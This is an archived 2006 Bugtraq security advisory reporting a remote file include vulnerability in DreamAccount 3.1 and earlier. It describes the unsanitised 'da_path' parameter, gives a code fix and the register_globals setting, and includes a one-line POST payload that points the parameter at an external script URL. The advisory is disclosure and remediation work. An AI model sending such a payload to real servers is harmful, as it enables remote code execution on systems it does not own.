lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060605092300.13598.qmail@securityfocus.com>
Date: 5 Jun 2006 09:23:00 -0000
From: admin@...orsecurity.de
To: bugtraq@...urityfocus.com
Subject: [MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include
 Vulnerability


[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability
-------------------------------------------------------------------------

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost  

Page: http://dreamcost.com

Risc: High

Credits:
----------------------------

Discovered by: David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de

Original Advisory:
----------------------------
http://www.majorsecurity.de/advisory/major_rls8.txt

Affected Products:
----------------------------

DreamAccount 3.1 and prior

Description:
----------------------------

DreamAccount is a membership and subscription software application that is both simple to use and install, 
while remaining affordable enough for even the smallest startup.

Requirements:
----------------------------

register_globals = On

Vulnerability:
----------------------------

Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------

I think you can fix this bug by replacing the following vulnerable code in the 
"auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this
problem.

Vulnerable one:   "require($da_path . "setup.php");"
MajorSecurity fix: "require("setup.php");"

Set "register_globals" to "Off".

Exploitation:
----------------------------

Post data:

da_path=http://www.yourspace.com/yourscript.php?


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ